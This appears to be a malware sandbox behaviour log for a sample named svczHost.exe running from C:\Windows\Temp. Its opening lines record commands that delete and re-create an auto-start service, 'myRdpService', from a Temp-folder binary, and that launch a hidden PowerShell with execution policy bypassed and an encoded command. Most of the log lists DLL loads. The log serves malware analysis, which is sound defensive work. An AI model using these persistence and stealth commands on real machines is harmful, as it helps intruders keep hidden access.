      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
